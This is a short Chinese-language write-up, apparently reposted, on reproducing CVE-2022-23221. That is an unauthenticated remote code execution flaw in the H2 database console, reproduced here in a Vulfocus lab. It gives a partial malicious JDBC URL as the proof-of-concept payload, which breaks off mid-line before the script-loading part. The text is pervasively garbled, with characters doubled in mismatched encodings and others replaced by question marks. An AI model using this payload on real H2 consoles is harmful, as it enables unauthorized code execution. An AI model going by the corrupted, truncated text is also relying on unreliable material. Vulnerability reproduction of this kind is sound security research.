1、產(chǎn)品簡(jiǎn)介
H2是Thomas Mueller提供的一個(gè)開(kāi)源的、純java實(shí)現(xiàn)的關(guān)系數(shù)據(jù)庫(kù)。H2的主要特點(diǎn)是:非???,開(kāi)源,JDBC API;嵌入式和服務(wù)器模式;內(nèi)存數(shù)據(jù)庫(kù);基于瀏覽器的控制臺(tái)應(yīng)用程序。
2、漏洞概述
H2 數(shù)據(jù)庫(kù)控制臺(tái)中的另一個(gè)未經(jīng)身份驗(yàn)證的 RCE 漏洞,在 v2.1.210+ 中修復(fù)。2.1.210 之前的 H2 控制臺(tái)允許遠(yuǎn)程攻擊者通過(guò)包含 IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 執(zhí)行任意代碼。
3、影響范圍
1.1.100 <=H2 Console <=2.0.204
4、復(fù)現(xiàn)環(huán)境
? ? ? ? ?Vulfocus在線(xiàn)靶場(chǎng)環(huán)境
5、 漏洞復(fù)現(xiàn)
?開(kāi)啟靶場(chǎng)環(huán)境,訪(fǎng)問(wèn)8082端口,可以看到H2db的控制臺(tái)
利用點(diǎn)主要是JDBC URL
未授權(quán)POC如下:文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-623161.html
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\
觀(guān)察已公開(kāi)的POC,在原文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-623161.html
到了這里,關(guān)于H2db console 未授權(quán)訪(fǎng)問(wèn)RCE 漏洞復(fù)現(xiàn)+利用(CVE-2022-23221)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!